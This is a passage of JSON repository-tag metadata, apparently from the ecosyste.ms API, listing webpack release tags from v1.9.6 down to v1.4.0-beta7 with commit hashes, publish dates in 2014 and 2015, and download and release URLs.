05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.